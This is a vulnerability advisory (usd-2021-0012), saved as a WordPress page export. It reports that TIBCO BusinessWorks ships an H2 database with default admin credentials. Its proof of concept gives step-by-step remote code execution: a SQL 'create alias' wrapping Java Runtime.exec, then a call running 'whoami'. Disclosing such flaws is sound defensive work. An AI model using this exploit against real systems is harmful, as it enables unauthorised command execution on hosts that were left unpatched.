[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n
<\/span> <\/span><\/p>\n TIBCO ActiveMatrix BusinessWorks installs an H2 database by default. The admin user of this database has default credentials. The H2 database allows to create and execute arbitrary Java functions.<\/p>\n Default Credentials can often be found in configuration files or official manuals. Additionally, they may be looked up in other publicly available sources. Actively using default credentials is particularly dangerous because it provides attackers with a trivial entry point and does not require further technical understanding to get access to the system.<\/p>\n The TIBCO BusinessWorks installations features a \"TIBCO Enterprise Administrator\" (TEA). It seems that the default installation of this admin interface creates the vulnerable H2 service with default administrative credentials. H2 admins have remote code execution by design. The vulnerability is published as CVE-2018-10054<\/a> but never got fixed.<\/p>\n <\/span><\/p>\n 1. Identify the service running an H2 database server. In the test environment this was running on port 23492. However, this could change for other systems.<\/p>\n 2. Use a local instance of the H2 console<\/a> to login to the database<\/p>\n 3. In the login panel of the H2 console, use the following settings:<\/p>\n 4. The UI allows to run SQL statements. Create an alias, which is nothing else than a Java method:\u00a0<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||20px||false|false\" global_colors_info=\"{}\"]<\/p>\n create alias exec as ' java.lang.Process process = java.lang.Runtime.getRuntime().exec(cmd); String line; int exitVal = process.waitFor(); }<\/p>\n ';<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"]<\/p>\n 5. Call the alias with the following SQL statement:<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n call exec(\"whoami\")<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n This returns:<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n tibco<\/p>\n [\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n <\/br><\/p>\n This security vulnerability was found by Konstantin Samuel of usd AG.<\/p>\n<\/div>\n<\/div>\n [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":" usd-2021-0012 | TIBCO ActiveMatrix BusinessWorks Advisory ID: usd-2021-0012Affected Product: TIBCO BusinessWorks Affected Version: 6.5.0 hotfix 10 build V159Vulnerability Type: CWE-521: Weak Password RequirementsSecurity Risk: CriticalVendor URL: https:\/\/www.tibco.com\/Vendor Status: addressed via guidance Description TIBCO ActiveMatrix BusinessWorks installs an H2 database by default. The admin user of this database has default credentials. The H2 database allows to […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-17007","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/17007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=17007"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/17007\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=17007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Advisory ID<\/strong>: usd-2021-0012<\/span>
Affected Product<\/strong>: TIBCO BusinessWorks <\/span>
Affected Version<\/strong>: 6.5.0 hotfix 10 build V159<\/span>
Vulnerability Type<\/strong>: CWE-521: Weak Password Requirements<\/span>
Security Risk<\/strong>: Critical<\/span>
Vendor URL<\/strong>: https:\/\/www.tibco.com\/<\/a>
Vendor Status<\/strong>: addressed via guidance<\/a><\/span><\/em><\/p>\nDescription<\/h3>\n
Proof of Concept (PoC)<\/h3>\n
\n
String exec(String cmd) throws java.io.IOException,
java.lang.InterruptedException {<\/p>\n
StringBuilder output = new StringBuilder();
java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));<\/p>\n
while ((line = reader.readLine()) != null) {
output.append(line + \"\\n\");
}<\/p>\n
if (exitVal == 0) {
return output.toString();
}
return \"Error\";<\/p>\nFix<\/h3>\n
References<\/h3>\n
\n
<\/h3>\n
Timeline<\/h3>\n
\n
<\/h3>\n
Credits<\/h3>\n